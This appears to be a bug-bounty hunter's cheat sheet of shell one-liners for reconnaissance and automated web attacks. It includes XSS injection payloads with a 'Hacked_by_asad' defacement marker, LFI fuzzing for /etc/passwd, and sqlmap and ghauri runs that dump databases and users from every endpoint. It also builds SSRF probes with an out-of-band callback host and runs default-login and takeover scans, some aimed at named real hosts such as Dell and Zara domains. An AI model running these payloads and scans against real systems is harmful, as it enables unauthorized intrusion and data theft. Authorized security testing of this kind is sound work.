👑Find Endpoints

Wide scope — input file: scope.txt
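# Wide-scope endpoint discovery for every host listed in scope.txt.
# Sources: katana passive sources, waybackurls, gau. The union is deduped,
# the URLs that carry a query string are kept for parameter work, and Gxss is
# run over those to see which ones reflect the marker.
# Inputs:  scope.txt
# Outputs: all_endpoints.txt (raw union), endpoints.txt (deduped),
#          fuzz_parameters.txt, confirm_xss.txt, asad.txt (arjun)
# Note: every stage ends in `tee`, so the `&&` chain only sees tee's status;
# a failing collector does not stop the chain. Run under `set -o pipefail`
# if that matters.
katana -ps -pss waybackarchive,commoncrawl,alienvault -f qurl < scope.txt | tee all_endpoints.txt \
  && waybackurls < scope.txt | tee -a all_endpoints.txt \
  && gau < scope.txt | tee -a all_endpoints.txt \
  && urldedupe < all_endpoints.txt | tee endpoints.txt \
  && grep -F -- '=' endpoints.txt | sort -u > fuzz_parameters.txt \
  && Gxss -p '"><hacked' < fuzz_parameters.txt | tee confirm_xss.txt
# Passive parameter discovery over the raw union (no requests are sent with --passive).
arjun -i all_endpoints.txt -oT asad.txt -t 10 -T 10 --passive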

# Resolve the hostname with the system resolver.
target_host="mytoken.us.dell.com"
nslookup "$target_host"

hostname:"mytoken.us.dell.com"

Hunt Single target with Ext-Endpoint

Extension-based endpoint testing
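# Extension-based endpoint testing for the hosts in live.txt.
# 1. Active crawl (katana, hakrawler) restricted to dynamic extensions.
# 2. The same extensions pulled out of all_endpoints.txt (passive results).
# 3. Everything re-checked for HTTP 200, then arjun over the live set.
# 4. Archived URLs (waybackurls, gau) re-checked for 200, split by extension,
#    and arjun over that set too.
# Inputs:  live.txt, all_endpoints.txt
# Outputs: live_ext_endpoints.txt, live_endpoints_Arjun_result.txt,
#          old_endpoints_Arjun_result.txt; intermediates are removed at the end.
# Fixes vs the original: the first all_endpoints grep used `tee` without -a
# and discarded the katana results; `.php$` etc. were unescaped and matched
# any character before the extension; the original ran arjun over a
# live_endpoints.txt that nothing in this flow creates (live_ext_endpoints.txt
# is the file it produces — confirm that is the intended input).
# crwal_endpoints.txt is written but not read here; it is appended to, so it
# accumulates across runs.
exts=(php html htm asp aspx jsp jspx do action)

katana -d 5 -em php,htm,html,asp,aspx,jsp,jspx,do,action < live.txt | sort -u | tee active_ext_endpoint.txt
hakrawler -u -d 3 < live.txt | tee -a crwal_endpoints.txt

for ext in "${exts[@]}"; do
  grep -E -- "\.${ext}$" all_endpoints.txt | uro | tee -a active_ext_endpoint.txt
done
grep -E -- '\.js$' all_endpoints.txt | tee -a active_ext_endpoint.txt

sort -u active_ext_endpoint.txt | httpx -mc 200 -silent | tee live_ext_endpoints.txt

# Archived URLs for the same hosts. old_endpoints.txt has already been through
# uro, so the per-extension split below does not run it again.
waybackurls < live.txt | tee archive_endpoints.txt
gau < live.txt | tee -a archive_endpoints.txt
sort -u archive_endpoints.txt | uro | httpx -mc 200 -silent | tee old_endpoints.txt
: > old_ext_endpoint.txt
for ext in "${exts[@]}" js; do
  grep -E -- "\.${ext}$" old_endpoints.txt | tee -a old_ext_endpoint.txt
done

arjun -i live_ext_endpoints.txt -oT live_endpoints_Arjun_result.txt \
  && arjun -i old_ext_endpoint.txt -oT old_endpoints_Arjun_result.txt \
  && rm -f -- crwal_endpoints.txt active_ext_endpoint.txt archive_endpoints.txt old_endpoints.txt old_ext_endpoint.txt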
Parameters testing
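# Parameter discovery for the hosts in live.txt: crawl (katana, hakrawler)
# and archives (waybackurls, gau), keep URLs that answer 200, then split off
# the ones carrying a query string.
# Inputs:  live.txt
# Outputs: live_endpoints.txt, live_parametrs.txt, old_endpoints.txt,
#          old_parametrs.txt, all_endpoints.txt, all_parametrs.txt
# Each stage ends in `tee`, so chaining with && gained nothing; the stages run
# one after another and only the final merge/cleanup is chained.
katana -d 5 -f qurl < live.txt | tee crwal_endpoints.txt
hakrawler -u -d 3 < live.txt | tee -a crwal_endpoints.txt
sort -u crwal_endpoints.txt | uro | httpx -mc 200 -silent | tee live_endpoints.txt
grep -F -- '=' live_endpoints.txt | tee live_parametrs.txt
waybackurls < live.txt | tee archive_endpoints.txt
gau < live.txt | tee -a archive_endpoints.txt
sort -u archive_endpoints.txt | uro | httpx -mc 200 -silent | tee old_endpoints.txt
grep -F -- '=' old_endpoints.txt | tee old_parametrs.txt
cat -- live_endpoints.txt old_endpoints.txt > all_endpoints.txt \
  && cat -- live_parametrs.txt old_parametrs.txt > all_parametrs.txt \
  && rm -f -- crwal_endpoints.txt archive_endpoints.txt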
vulnerability testing
XSS Testing:
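# Reflection checks over all_parametrs.txt.
# The curl loop only reports whether the marker string comes back verbatim in
# the response body; that is reflection, not a confirmed XSS.
# Outputs: live_combinedfuzz.json, live_XSS.txt, possible_xss.txt (appended)
# Fixes vs the original: `read` without -r and an unquoted URL; echo -e is
# replaced by printf; curl gets --max-time so one dead host cannot stall the
# loop; the bhedak/airixss pair on the marquee line used </h1> in one payload
# and </h2> in the other, so airixss could never match what bhedak injected
# (aligned to the </h2> form used elsewhere on this page); `ca t` -> `cat`.
qsreplace '"><()' < all_parametrs.txt | tee live_combinedfuzz.json
while IFS= read -r host; do
  [[ -n "$host" ]] || continue
  # --insecure skips TLS verification on purpose (testing hosts with bad certs)
  if curl --silent --path-as-is --insecure --max-time 10 -- "$host" | grep -qsF -- '"><()'; then
    printf '%s \033[91m Vulnerable \033[0m\n\n' "$host"
  else
    printf '%s  \033[92m Not Vulnerable \033[0m\n\n' "$host"
  fi
done < live_combinedfuzz.json | tee live_XSS.txt
bhedak '"><a href=https://bing.com>hacked' < all_parametrs.txt | airixss -p '"><a href=https://bing.com>hacked' | tee -a possible_xss.txt
bhedak '"></h2><marquee>Hacked_by_asad</marquee>' < all_parametrs.txt | airixss -p '"></h2><marquee>Hacked_by_asad</marquee>' | tee -a possible_xss.txt
grep -F -- '=' all_endpoints.txt | qsreplace '"><img src=x onerrora=confirm() onerror=alert(1)>' | freq | tee -a possible_xss.txt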
------------
LFI Testing:
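# LFI probe: gf picks candidate parameters, the value is stripped, FUZZ is
# substituted, and ffuf runs once per unique URL with the LFI wordlist,
# matching "root:" in the response.
# Fix vs the original: URL read with -r and quoted, so backslashes and glob
# characters in a URL are passed through untouched.
gf lfi < all_parametrs.txt | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u \
  | while IFS= read -r url; do
      [[ -n "$url" ]] || continue
      ffuf -u "$url" -w /home/kali/lfi.txt -c -mr "root:" -v
    done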

Open-Redirect Testing:
# Open-redirect check: uro collapses near-duplicate URLs, then the single
# URL-check template runs in DAST mode over the result.
uro < all_parametrs.txt \
  | nuclei -t /home/kali/nuclei-templates/url-check-templates/vuln/Url.yaml --dast

------------
SQLI Testing: 
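# SQLi checks.
# 1. Error-based: append a quote to every parameter value and match common
#    DBMS error strings in the response (httpx-toolkit -mr).
# 2. gf sqli candidates -> ghauri in batch mode.
# 3./4. Per-URL ghauri and sqlmap runs over every endpoint. These are very
#    noisy (level 3 against every URL); the -m bulk form in step 2 is the
#    quieter route.
# Outputs: params.txt, sqli_vuln.txt, sqli_parameters.txt
# Fixes vs the original: `grep "\?"` is ambiguous in GNU BRE, replaced by a
# fixed-string match; `uniq` on unsorted input only dropped adjacent
# duplicates; in steps 3/4 the option string was fused onto the URL with no
# spaces and a stray "." (`$host--batch--level=3.-b...`), so the tools would
# have received one malformed argument; `read` now uses -r and the URL is quoted.
grep -F -- '?' all_endpoints.txt | sed "s/=.*/=A'/" | sort -u > params.txt
httpx-toolkit -mr ".*SQL.*|.*syntax.*|.*error.*|.*Server.*|.*Application.*|.*Error.*|.*'/'.*|.*ORA-00933.*|.*Microsoft.*|.*PSQLException.*" < params.txt | tee sqli_vuln.txt
gf sqli < all_parametrs.txt | tee sqli_parameters.txt && ghauri -m sqli_parameters.txt --batch --dbs --level 3 --confirm
while IFS= read -r host; do
  [[ -n "$host" ]] || continue
  ghauri -u "$host" --batch --level 3 -b --current-user --current-db --hostname --dbs
done < all_endpoints.txt
while IFS= read -r host; do
  [[ -n "$host" ]] || continue
  python3 /home/kali/sqlmap-dev/sqlmap.py -u "$host" --batch --level 3 -b --current-user --current-db --hostname --dbs
done < all_endpoints.txt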
------------
SSRF Testing:
# SSRF candidate generation: httpx keeps the reachable URLs, qsreplace swaps
# every parameter value for the out-of-band callback URL. qsreplace only
# rewrites text — this line prints the candidates and does not request them.
httpx -silent -threads 1000 < all_parametrs.txt \
  | qsreplace http://dmrpgcwtwninoonpyohov3sjuhmqyt1c4.oast.fun
------------
nuclei Testing:
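# nuclei DAST templates over all_parametrs.txt.
# Fix vs the original: `--retries` takes an integer; with none given the next
# token (`--dast`) would be consumed as its value. 2 is the retry count this
# page uses for its other nuclei runs.
nuclei -l all_parametrs.txt -t dast/ --retries 2 --dast -o live_dast_nuclei.txt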


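# arjun parameter discovery over all_ext_endpoint.txt.
# First run: passive, rate-limited, custom User-Agent. arjun's -m takes a
# single method, so the original `-m GET, POST-headers ...` (a space inside
# the method list and --headers fused onto POST) could not parse; GET is used
# here and POST needs a second run with `-m POST`.
arjun -i all_ext_endpoint.txt -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET --headers "User-Agent: Mozilla/5.0"

# Second run: active, 10 threads, 10 s timeout.
arjun -i all_ext_endpoint.txt -oT asad.txt -t 10 -T 10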

My Methodology


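# Subdomain enumeration for one apex domain, then HTTP probing.
# Sources: sublist3r, subfinder, assetfinder, findomain, crt.sh (JSON).
# Outputs: livesubdomains.txt, technologies.txt; per-source files are removed.
# Fixes vs the original: crt.txt was written to /home/kali/target/dell/ but
# read back from the working directory, so the merge missed it unless the
# shell happened to be in that directory — every file is relative here;
# curl gets -f so a non-2xx from crt.sh fails the step instead of handing jq
# an HTML error page; rm uses -f -- so a missing file does not abort.
domain="delltechnologies.com"
sublist3r -d "$domain" -o sublist3r.txt
subfinder -d "$domain" -o subfinder.txt
assetfinder --subs-only "$domain" > assetfinder.txt
findomain -t "$domain" -u findomain.txt
curl -sf --max-time 60 "https://crt.sh/?q=%25.${domain}&output=json" | jq -r '.[].name_value' | tee crt.txt
cat -- sublist3r.txt crt.txt assetfinder.txt subfinder.txt findomain.txt | sort -u > sort.txt
httpx -silent -threads 50 < sort.txt | tee livesubdomains.txt
rm -f -- sublist3r.txt crt.txt assetfinder.txt subfinder.txt findomain.txt sort.txt
wc -l < livesubdomains.txt
httpx -mc 301,302,200 -title -probe -status-code -content-length -tech-detect -fr -o technologies.txt < livesubdomains.txt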



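# Content discovery with the html-Endpoints wordlist.
# Fix vs the original: both URLs were malformed (`https:website.com`,
# `https://https:website.co`) and would not have been requested as intended.
ffuf -u https://website.com/FUZZ -w html-Endpoints.txt -v -e .php -fc 403,401 -p 0.5-0.6
dirsearch -u https://website.com/path/ -w html-Endpoints.txt -O -e php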




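# Live-set methodology: crawl the hosts in live.txt, keep endpoints that
# answer 200, then run the parameter / reflection / LFI / redirect / SQLi /
# SSRF / JS-secret checks over that set.
# Inputs:  live.txt, lfi.txt, dast/ templates
# Outputs: crwal_endpoints.txt, live_endpoints.txt, live_endpoints_Arjun_result.txt,
#          live_parametrs.txt, live_combinedfuzz.json, live_XSS.txt, params.txt,
#          sqli_vuln.txt, sqli_parameters.txt, live_dast_nuclei.txt,
#          live_js_files.txt, live_js_secrets.txt
# Fixes vs the original: `read` without -r and unquoted URLs in every loop;
# echo -e replaced by printf; `grep '.js$'` and `grep "\?"` made exact;
# `uniq` on unsorted input replaced by sort -u; curl gets --max-time.
katana -d 5 -f qurl < live.txt | tee crwal_endpoints.txt && wc -l < crwal_endpoints.txt
hakrawler -u -d 3 < live.txt | tee -a crwal_endpoints.txt && wc -l < crwal_endpoints.txt
sort -u crwal_endpoints.txt | httpx -mc 200 -silent | tee live_endpoints.txt
arjun -i live_endpoints.txt -oT live_endpoints_Arjun_result.txt
grep -F -- '=' live_endpoints.txt | tee live_parametrs.txt && wc -l < live_parametrs.txt
reflector live_parametrs.txt

# Reflection check: does the marker come back verbatim? (reflection only, not a confirmed XSS)
qsreplace '"><()' < live_parametrs.txt | tee live_combinedfuzz.json
while IFS= read -r host; do
  [[ -n "$host" ]] || continue
  # --insecure skips TLS verification on purpose
  if curl --silent --path-as-is --insecure --max-time 10 -- "$host" | grep -qsF -- '"><()'; then
    printf '%s \033[91m Vulnerable \033[0m\n\n' "$host"
  else
    printf '%s  \033[92m Not Vulnerable \033[0m\n\n' "$host"
  fi
done < live_combinedfuzz.json | tee live_XSS.txt
bhedak '"></h2><marquee>Hacked_by_asad</marquee>' < live_parametrs.txt | airixss -p '"></h2><marquee>Hacked_by_asad</marquee>'
bhedak '"><svg onload=confirm(1)>' < live_parametrs.txt | airixss -p '"><svg onload=confirm(1)>'
gf xss < live_parametrs.txt | qsreplace '"><img src=x onerror=confirm(1)>' | airixss -payload "confirm(1)"

# LFI: strip values, substitute FUZZ, one ffuf run per unique URL
gf lfi < live_parametrs.txt | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u \
  | while IFS= read -r url; do
      [[ -n "$url" ]] || continue
      ffuf -u "$url" -w lfi.txt -c -mr "root:" -v
    done

# Open redirect
uro < live_parametrs.txt | nuclei -t /home/kali/nuclei-templates/url-check-templates/vuln/Url.yaml --dast

# Error-based SQLi: append a quote to each value and match DBMS error strings
grep -F -- '?' live_endpoints.txt | sed "s/=.*/=A'/" | sort -u > params.txt
httpx-toolkit -mr ".*SQL.*|.*syntax.*|.*error.*|.*Server.*|.*Application.*|.*Error.*|.*'/'.*|.*ORA-00933.*|.*Microsoft.*|.*PSQLException.*" < params.txt | tee sqli_vuln.txt
gf sqli < live_parametrs.txt | tee sqli_parameters.txt && ghauri -m sqli_parameters.txt --batch --dbs --level 3 --confirm

# SSRF candidates: qsreplace only rewrites the URLs; nothing here sends them
httpx -silent -threads 1000 < live_parametrs.txt | qsreplace http://YOUR.burpcollaborator.net
nuclei -l live_parametrs.txt -t dast/ --dast -o live_dast_nuclei.txt

# JS files from the live set, scanned for secrets
grep -E -- '\.js$' live_endpoints.txt | tee live_js_files.txt && wc -l < live_js_files.txt
while IFS= read -r url; do
  [[ -n "$url" ]] || continue
  secretfinder -i "$url" -o cli >> live_js_secrets.txt
done < live_js_files.txt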



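# Archive-set methodology: the same checks as the live set, but over archived
# URLs (waybackurls, gau) for the hosts in live.txt that still answer 200.
# Also builds the arjun fuzz list, scans JS files for secrets, and extracts
# links from JS with subjs + JSA.
# Inputs:  live.txt, live_endpoints.txt (JS merge), lfi.txt, dast/ templates
# Outputs: archive_endpoints.txt, old_endpoints.txt, old_endpoints_Arjun_result.txt,
#          old_parametrs.txt, old_combinedfuzz.json, old_XSS.txt, params.txt,
#          sqli_parameters.txt, old_dast_nuclei.txt, arjun_fuzz_endpoints.txt,
#          old_js_files.txt, old_js_secrets.txt, js_endpoints.txt
# Fixes vs the original: `cat -u` dropped (no effect); `read` without -r and
# unquoted URLs; echo -e -> printf; `old_js_files.txt | wc -l` had no `cat`
# and would try to execute the file; `-retries` had no value and would have
# swallowed `--dast`; egrep -> grep -E with an escaped dot; `grep "\?"` and
# `grep '.js$'` made exact; curl gets --max-time.
waybackurls < live.txt | tee archive_endpoints.txt && wc -l < archive_endpoints.txt
gau < live.txt | tee -a archive_endpoints.txt && wc -l < archive_endpoints.txt
sort -u archive_endpoints.txt | uro | httpx -mc 200 -silent | tee old_endpoints.txt
arjun -i old_endpoints.txt -oT old_endpoints_Arjun_result.txt
grep -F -- '=' old_endpoints.txt | uro | tee old_parametrs.txt && wc -l < old_parametrs.txt
reflector old_parametrs.txt

# Reflection check (reflection only, not a confirmed XSS)
uro < old_parametrs.txt | httpx -silent | qsreplace '"><()' | tee old_combinedfuzz.json
while IFS= read -r host; do
  [[ -n "$host" ]] || continue
  # --insecure skips TLS verification on purpose
  if curl --silent --path-as-is --insecure --max-time 10 -- "$host" | grep -qsF -- '"><()'; then
    printf '%s \033[91m Vulnerable \033[0m\n\n' "$host"
  else
    printf '%s  \033[92m Not Vulnerable \033[0m\n\n' "$host"
  fi
done < old_combinedfuzz.json | tee old_XSS.txt
uro < old_parametrs.txt | httpx -silent | bhedak '"></h2><marquee>Hacked_by_asad</marquee>' | airixss -p '"></h2><marquee>Hacked_by_asad</marquee>'
bhedak '"><svg onload=confirm(1)>' < old_parametrs.txt | airixss -p '"><svg onload=confirm(1)>'
gf xss < old_parametrs.txt | uro | httpx -silent | qsreplace '"><img src=x onerror=confirm(1)>' | airixss -payload "confirm(1)"

# Open redirect
uro < old_parametrs.txt | httpx -silent | nuclei -t /home/kali/nuclei-templates/url-check-templates/vuln/Url.yaml --dast

# LFI: strip values, substitute FUZZ, one ffuf run per unique URL
gf lfi < old_parametrs.txt | uro | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u \
  | while IFS= read -r url; do
      [[ -n "$url" ]] || continue
      ffuf -u "$url" -w lfi.txt -c -mr "root:" -v
    done

# Error-based SQLi: append a quote to each value and match DBMS error strings
grep -F -- '?' old_endpoints.txt | sed "s/=.*/=A'/" | sort -u > params.txt
httpx-toolkit -mr ".*SQL.*|.*syntax.*|.*error.*|.*Server.*|.*Application.*|.*Error.*|.*'/'.*|.*ORA-00933.*|.*Microsoft.*|.*PSQLException.*" < params.txt
gf sqli < old_parametrs.txt | uro | httpx -silent > sqli_parameters.txt && ghauri -m sqli_parameters.txt --batch --dbs --level 3 --confirm

# SSRF candidates: qsreplace only rewrites the URLs; nothing here sends them
uro < old_parametrs.txt | httpx -silent -threads 1000 | qsreplace http://YOUR.burpcollaborator.net
nuclei -l old_parametrs.txt -t dast/ --retries 2 --dast -o old_dast_nuclei.txt

# Non-static endpoints for arjun
grep -Eiv -- '\.(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)' old_endpoints.txt | uro | tee arjun_fuzz_endpoints.txt

# JS files from both sets, scanned for secrets
cat -- live_endpoints.txt old_endpoints.txt | grep -E -- '\.js$' | tee old_js_files.txt && wc -l < old_js_files.txt
while IFS= read -r url; do
  [[ -n "$url" ]] || continue
  secretfinder -i "$url" -o cli >> old_js_secrets.txt
done < old_js_files.txt

# Link extraction from JS (all hosts, then the single-host form; the second
# overwrites js_endpoints.txt, as in the original)
subjs < live.txt | python3 /home/kali/tools/JSA/jsa.py | tee js_endpoints.txt
printf '%s\n' "https://press.zara.com" | subjs | python3 /home/kali/tools/JSA/jsa.py | tee js_endpoints.txt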

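# Template scans over livesubdomains.txt, then build live.txt (hosts that
# answer 200) for the crawling steps above.
# Outputs: *_nuclei.txt per template set, live.txt
# Fix vs the original: `httpx mc 200` lacked the dash on -mc, so httpx would
# have treated "mc" and "200" as inputs rather than as a status filter.
# Each nuclei run re-reads the whole host list; several -t values can be given
# to one invocation if the per-set output files are not needed.
nuclei -as -o tech_detect_nuclei.txt < livesubdomains.txt
nuclei -t /home/kali/nuclei-templates/subdomains-check-templates --retries 2 -o subdomains_check_nuclei.txt < livesubdomains.txt
nuclei -t /home/kali/nuclei-templates/all_freaking_nuclei_templates -o all_freaking_nuclei.txt < livesubdomains.txt
nuclei -t cves/ -o cves_nuclei.txt < livesubdomains.txt
nuclei -t exposures/ -o exposures_nuclei.txt < livesubdomains.txt
nuclei -t vulnerabilities/ -o vulnerabilities_nuclei.txt < livesubdomains.txt
nuclei -t exposed-panels/ -o exposed-panels_nuclei.txt < livesubdomains.txt
nuclei -t misconfiguration/ -o misconfiguration_nuclei.txt < livesubdomains.txt
nuclei -t default-logins/ -o default_logins_nuclei.txt < livesubdomains.txt
nuclei -t takeovers/ -o takeovers_nuclei.txt < livesubdomains.txt
httpx -mc 200 < livesubdomains.txt > live.txt && wc -l < live.txt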

Fuzzing endpoints with the same extension using my wordlists; save the result in hidden_endpoints.txt


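# Content discovery with the html-Endpoints wordlist, then arjun over
# hidden_endpoints.txt.
# Fixes vs the original: `https:website.com` lacked the `//`; the arjun line
# was repeated verbatim and runs once here.
# Note: nothing in this block writes hidden_endpoints.txt — ffuf output goes
# to the terminal; see the ffuf `> hidden_endpoints.txt` form further down
# this page, or ffuf's -o/-of options.
ffuf -u https://website.com/FUZZ -w html-Endpoints.txt -v -fc 403,401 -p 0.5-0.6
arjun -i hidden_endpoints.txt -oT hidden_endpoints_Arjun_result.txt

dirsearch -u https://press.zara.com/ECOMPressSite/ -w html-Endpoints.txt
dirsearch -u https://press.zara.com/ECOMPressSite/ -w html-Endpoints.txt -O -e php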

My OneLiner

Configure Domain Name and Web Extensions and Save File Name


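# Single-target endpoint collection: active crawl (katana, hakrawler) plus
# archives (CDX, gau, waybackurls), every set re-checked for HTTP 200.
# Outputs: active_ext_endpoint.txt, active_endpoints_result.txt,
#          active_endpoints.txt, all_endpoints.txt, old_php_endpoints.txt,
#          old_html_endpoints.txt, old_endpoints.txt
# Fixes vs the original: the second katana call had `-ef` with no value,
# which makes katana error out (dropped — the call is the unfiltered crawl);
# `uniq` before `sort` only removed adjacent duplicates, replaced by sort -u;
# the CDX query is fetched over https so the URL list that drives later
# probing cannot be altered in transit; rm uses -f -- so a missing
# intermediate does not abort the chain.
target="demo.testfire.net"
katana -u "https://${target}" -em php,htm,html,asp,aspx,jsp,jspx,do,action | httpx -mc 200 | sort -u > active_ext_endpoint.txt \
  && katana -u "https://${target}" | httpx -mc 200 | sort -u > katana_endpoint_result.txt \
  && printf '%s\n' "https://${target}/" | hakrawler -u -d 3 | httpx -mc 200 | sort -u > hakrawler_endpoint_result.txt \
  && sort -u katana_endpoint_result.txt hakrawler_endpoint_result.txt > active_endpoints_result.txt \
  && httpx -mc 200 < active_endpoints_result.txt > active_endpoints.txt \
  && wget -O archive_endpoint_result.txt "https://web.archive.org/cdx/search/cdx?url=${target}/*&output=text&fl=original&collapse=urlkey&from=" \
  && gau "$target" --o gau_endpoint_result.txt \
  && waybackurls "$target" > wayback_endpoint_result.txt \
  && sort -u archive_endpoint_result.txt gau_endpoint_result.txt wayback_endpoint_result.txt > all_endpoints.txt \
  && grep -E -- '\.php$' all_endpoints.txt | httpx -mc 200 > old_php_endpoints.txt \
  && grep -E -- '\.html$' all_endpoints.txt | httpx -mc 200 > old_html_endpoints.txt \
  && httpx -mc 200 < all_endpoints.txt > old_endpoints.txt \
  && rm -f -- katana_endpoint_result.txt hakrawler_endpoint_result.txt gau_endpoint_result.txt wayback_endpoint_result.txt archive_endpoint_result.txt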

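# JS and interesting-file triage for one target.
# 1. JS files from a katana JS crawl plus all_endpoints.txt, secret-scanned.
# 2. xnLinkFinder over the JS files (its parameters.txt is renamed — that
#    default output name is taken from this note; confirm on your version).
# 3. .log/.bak/.xlsx hits from all_endpoints.txt.
# 4. gauplus over livesubdomains.txt, titles matched for login and upload pages.
# Inputs:  all_endpoints.txt, livesubdomains.txt
# Outputs: js_files.txt, secrets.txt, js_hidden_endpoint.txt,
#          js_hidden_parameters.txt, log.txt, bak.txt, xlsx.txt,
#          gauplus_titles.txt (new intermediate), loginPanel.txt, file_upload.txt
# Fixes vs the original: `grep ".js$"` matched any character before "js";
# the secretfinder loop read URLs without -r and unquoted; gauplus + httpx
# ran twice over the same input and now runs once into gauplus_titles.txt.
target="https://press.zara.com"
katana -u "$target" -jc -d 2 | grep -E -- '\.js$' | httpx -mc 200 | sort -u > js_files.txt \
  && grep -E -- '\.js$' all_endpoints.txt | sort -u | httpx -mc 200 | anew js_files.txt \
  && while IFS= read -r url; do
       [[ -n "$url" ]] || continue
       secretfinder -i "$url" -o cli >> secrets.txt
     done < js_files.txt \
  && xnLinkFinder -i js_files.txt -sf "$target" -o js_hidden_endpoint.txt \
  && mv -- parameters.txt js_hidden_parameters.txt \
  && grep -Ei -- '\.log$' all_endpoints.txt | httpx -mc 200 | anew log.txt \
  && grep -Fi -- '.bak' all_endpoints.txt | httpx -mc 200 | anew bak.txt \
  && grep -Fi -- '.xlsx' all_endpoints.txt | httpx -mc 200 | anew xlsx.txt \
  && gauplus -subs < livesubdomains.txt | httpx -title > gauplus_titles.txt \
  && grep -i -- 'admin\|login\|signin\|phpmyadmin\|dashboard' gauplus_titles.txt | anew loginPanel.txt \
  && grep -i -- 'uploadform\|uploadfile\|choose file' gauplus_titles.txt | anew file_upload.txt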

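# Parameter triage over all_endpoints.txt (gf xss / gf sqli / any "=" /
# utm_), reflection checks with Gxss and kxss, then arjun over each endpoint
# set followed by the same reflection checks over arjun's output.
# Inputs:  all_endpoints.txt and, if present, active_endpoints.txt,
#          active_ext_endpoints.txt, old_endpoints.txt, old_jsp_endpoints.txt,
#          old_htm_endpoints.txt
# Outputs: xss_parameters.txt, sqli_parameters.txt, Fuzz_parameters.txt,
#          utm_parameters.txt, merged_parameters.txt, old_reflect_parameters.txt,
#          old_Unfiltered_parameters.txt, <set>_Arjun_result.txt,
#          merged_endpoints_Arjun_result_to_chek_XSS.txt,
#          Arjun_reflect_parameters.txt, Arjun_Unfiltered_parameters.txt
# Fix vs the original: the five arjun runs were chained with && on input
# files that the collection one-liner above does not all produce (it writes
# active_ext_endpoint.txt and old_html_endpoints.txt, not the names used
# here), so the first missing file aborted everything after it. Missing or
# empty inputs are now reported and skipped; the merge dedupes with sort -u.
gf xss < all_endpoints.txt | httpx -mc 200 > xss_parameters.txt
gf sqli < all_endpoints.txt | httpx -mc 200 > sqli_parameters.txt
grep -F -- '=' all_endpoints.txt | httpx -mc 200 > Fuzz_parameters.txt
grep -F -- 'utm_' all_endpoints.txt | httpx -mc 200 > utm_parameters.txt
sort -u Fuzz_parameters.txt xss_parameters.txt sqli_parameters.txt utm_parameters.txt > merged_parameters.txt
Gxss -c 100 -p asad < merged_parameters.txt | grep -F -- asad > old_reflect_parameters.txt
kxss < old_reflect_parameters.txt > old_Unfiltered_parameters.txt

arjun_results=()
for set in active_endpoints active_ext_endpoints old_endpoints old_jsp_endpoints old_htm_endpoints; do
  if [[ -s "${set}.txt" ]]; then
    arjun -i "${set}.txt" -oT "${set}_Arjun_result.txt"
    arjun_results+=("${set}_Arjun_result.txt")
  else
    printf 'skip: %s.txt missing or empty\n' "$set" >&2
  fi
done
if (( ${#arjun_results[@]} )); then
  cat -- "${arjun_results[@]}" > merged_endpoints_Arjun_result_to_chek_XSS.txt
else
  : > merged_endpoints_Arjun_result_to_chek_XSS.txt
fi
Gxss -c 100 -p asad < merged_endpoints_Arjun_result_to_chek_XSS.txt | grep -F -- asad > Arjun_reflect_parameters.txt
kxss < merged_endpoints_Arjun_result_to_chek_XSS.txt > Arjun_Unfiltered_parameters.txt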

My OneLiner for Burp

Configure Domain Name

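# Feed the collected endpoints through the local Burp proxy (so the traffic
# shows up there), then crawl the target through the same proxy with
# hakrawler and gospider.
# Fixes vs the original: `>> /dev/null` -> `> /dev/null`; the gospider line
# put `-p` (proxy) on the trailing grep, where it is not a grep option, and
# grepped for `$https://…` — `$https` is an unset variable that expands to
# nothing. The proxy flag now goes to gospider and the domain match is a
# quoted fixed string.
target="https://demo.testfire.net/"
proxy="http://127.0.0.1:8080"
cat -- active_endpoints.txt active_ext_endpoints.txt old_endpoints.txt old_jsp_endpoints.txt old_htm_endpoints.txt \
  | parallel -j 10 'curl --proxy http://127.0.0.1:8080 -sk {}' > /dev/null
printf '%s\n' "$target" | hakrawler -u -d 3 -proxy "$proxy"
gospider -s "$target" -c 10 -d 1 -t 20 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" --other-source -p "$proxy" \
  | grep -e "code-200" | grep -F -- "=" | grep -F -- "$target"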

-------------------------------------------------------------

Find Endpoints with the Same Extension Using Dirsearch

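# Extension sweep with dirsearch.
# Fixes vs the original: the extension list contained a pasted hyperlink
# ("http://sql.zip") where sql.zip was meant, and the second command had a
# typographic dash (— random-agent) instead of --random-agent.
dirsearch -u https://example.com -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js.,.json --full-url
dirsearch -u https://app.redacted.com -t 150 -x 403,404,500,429 -i 200,301,302 --random-agent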

-------------------------------------------------------------

Find endpoints with the Burp proxy using hakrawler

And Save in active_endpoints.txt

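# hakrawler crawl of the hosts in domain.txt: first through the Burp proxy
# (so the traffic lands there), then directly, keeping URLs that answer 200.
# The third line is the single-host form; it overwrites active_endpoints.txt.
# Fix vs the original: `uniq | httpx | sort` left duplicates that were not
# adjacent before httpx; sort -u after httpx dedupes the final list.
hakrawler -u -d 3 -proxy "http://127.0.0.1:8080" < domain.txt
hakrawler -u -d 3 < domain.txt | httpx -mc 200 | sort -u > active_endpoints.txt
printf '%s\n' "https://demo.testfire.net/" | hakrawler -u -d 3 | httpx -mc 200 | sort -u > active_endpoints.txt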

-------------------------------------------------------------

Find Endpoints with Burp proxy Using gospider

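# gospider crawl through the Burp proxy, keeping 200 responses that carry a
# query string on the target domain.
# Fix vs the original: `-p` (proxy) was attached to the trailing grep, where
# it is not a grep option, and the match pattern was `$https://…` — `$https`
# is an unset variable that expands to nothing. The proxy flag now goes to
# gospider and the domain match is a quoted fixed string.
target="https://demo.testfire.net/"
gospider -s "$target" -c 10 -d 1 -t 20 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" --other-source -p "http://127.0.0.1:8080" \
  | grep -e "code-200" | grep -F -- "=" | grep -F -- "$target"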

-------------------------------------------------------------

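# hakrawler crawl of one host, keeping same-host URLs with a query string and
# dropping static assets.
# Fixes vs the original: `"$http://…"` expanded the unset variable `$http` to
# nothing, so the pattern silently became `://testphp.vulnweb.com`; `egrep`
# is deprecated and the leading dot in its pattern was unescaped.
target="http://testphp.vulnweb.com"
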